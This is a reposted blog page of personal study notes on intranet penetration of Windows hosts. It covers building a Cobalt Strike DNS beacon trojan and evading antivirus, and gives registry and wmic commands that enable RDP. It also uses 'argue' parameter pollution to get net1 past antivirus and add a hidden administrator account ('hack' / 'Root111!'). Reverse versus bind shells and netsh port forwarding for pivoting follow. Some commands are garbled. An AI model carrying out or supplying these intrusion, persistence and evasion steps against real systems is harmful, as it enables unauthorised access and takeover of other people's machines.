Study notes for intranet penetration

Others 2020-10-15 16:44:19 views: null

1. Find the website path under windows

Visit the website, find a file owned on the website, and then use dir /s /b to search

dir / s /bc:\checkform.js

 /S Displays the files in the specified directory and all subdirectories.

 /B           uses an empty format (no title information or abstract). (For files, only the file name and extension are displayed, this one is more practical!)

2. Determine whether there is a separation of the station library

 3. Make DNS Beacon

  1. Prepare a VPS server (our CS server can be used directly), and port 53 of the machine must be open to the outside world. Then prepare a domain name.

  2. Configure domain name resolution records, create A records and NS records. The A record is resolved to the VPS server, and the NS record is resolved to the A record.

  3. CS opens the monitoring DNS Beacon, DNS Hosts fills in our NS record, DNS Host (Stager) fills in our A record.

  4. Generate DNS Trojan. The type of Trojan generated is Windows Executable(S). If the Trojan has anti-virus software, you can generate shellcode first, and then compile it without anti-virus.

  5. Execute the Trojan horse line.

By uploading an anti-virus dns Trojan, the execution was successful. The default online is a black frame, and the command cannot be executed.

Execute the following two commands to display and execute the commands normally.

checkinmode dns-txt

4. Open port 3389

Method 1: WinServer2012 to open port 3389 command is as follows:

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

View RDP port

Check the port and
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
get the connection port as 0xd3d, after conversion it is 3389

windows server 2003

On 1:
REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Off:
REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
On 2:
1,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2,REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3,REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

windows server 2008

Turn on:
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

Refer to the article of the boss: https://www.jianshu.com/p/8e7d2f78f5e1

Open and query port 3389

  开启3389端口:  通杀:  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1  2003:  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  2008:  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  多版本win08 win03 win7 win2012 winxp 执行3条:  1.wmic /namespace:\root\cimv2  erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1    2.wmic /namespace:\root\cimv2  erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1    3.reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f  开了远程桌面找不到?  简单暴力办法看看服务器有木有电话qq之类的,直接联系管理员问问,好好的3389端口非得换,不知道我找不到吗?  不闹了!容易挨打!  1、cmd执行:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber  2、cmd执行:tasklist /svc查询TermService对应PID,然后在netstat -ano查询的PID对应的端口号  3、查找注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ Wds dpwd\Tds  cp 中PortNumber的值

5. Use the argument parameter to bypass the antivirus software to add users

argue parameter pollution

Use adminstrator or system permissions

Use:

argue [command] [fake arguments]

argue command pollution parameters 

使用argue参数污染net1程序(注意是net1,而不是net,因为net还是会把真正的参数传递给net1的)argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx查看污染参数
argue
用污染的net1执行添加用户操作execute net1 user hack Root111! /addexecute net1 localgroup administrators hack /add

The argument argument pollutes the powershell.exe command

Direct use of powershell.exe will be blocked

argue powershell.exe xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Run argue again to check the pollution results

 

Execute executes powershell.exe without interception (shell commands will not succeed, because the shell is essentially cmd.exe /c arguments)

reference:

http://www.0x3.biz/archives/837.html

https://mp.weixin.qq.com/s/dVOBHSWGDUcxnC8g0NWEAg

6. reverse_tcpAnd the bind_tcpdifference:

[reverse_tcp]
attacker -> [contact me at the port 4444] -> victim

after the payload is executed
attacker <-> [port 4444] <-> victim

[bind_tcp]
attacker -> [open the way for me in the port 4444] -> victim

after execution
attacker <-> [port 4444] <-> victim

reverse_tcp: The attacker sets a port (LPORT) and IP (LHOST). The payload is executed on the victim machine and connects to the port of the attacker's IP. At this time, if the attacker monitors the port, it will find that the tester is connected.

bind_tcp: The attacker sets a port (LPORT), and the payload is executed on the tester to open the port so that the attacker can access it.

The reverse method is generally safer, because the test machine is connected to the attacker, so it is generally not discovered by the firewall; and bind is easily discovered by the security software and firewall when the test machine opens the port.

If the target machine can access the Internet, use it reverse_tcpand let the target machine connect to our server to establish a connection.

​ It bind_tcpis used when the target machine is in the intranet and cannot be out of the network. Open a port on the target machine that cannot go out of the network for the attacker to connect through the forwarded route.

Refer to the article by the boss: https://blog.csdn.net/adidala/article/details/24117711

7, netsh port forwarding

1. Add port forwarding:
first open the command prompt (cmd)
netsh interface portproxy add v4tov4 listenport=listening port connectaddress=address forwarded to connectport=port forwarded to
Example: netsh interface portproxy add v4tov4 listenport=9988 connectaddress=192.168. 88.110 connectport=9988

2. Check which ports are forwarded
netsh interface portproxy show all

3. Delete the forwarding rule
netsh interface portproxy delete v4tov4 listenaddress=192.168.88.110 listenport=9988

Refer to the big guy article: https://blog.csdn.net/hx7013/article/details/79786407

8, linux background running program

nobhp and & are both background commands

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Guess you like

Origin blog.csdn.net/qq_32393893/article/details/108321899
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com